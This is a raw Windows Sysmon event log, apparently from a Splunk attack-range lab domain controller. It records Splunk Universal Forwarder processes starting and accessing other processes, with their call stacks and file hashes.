AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:10.955{D28789B6-7CE5-5FA1-5801-000000008801}2736win-dc-807.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE9-5FA1-5D01-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE9-5FA1-5D01-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.063{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE9-5FA1-5D01-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:13.064{D28789B6-7CE9-5FA1-5D01-000000008801}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.550{D28789B6-7CEA-5FA1-5F01-000000008801}27442320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CEA-5FA1-5F01-000000008801}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CEA-5FA1-5F01-000000008801}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.409{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CEA-5FA1-5F01-000000008801}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 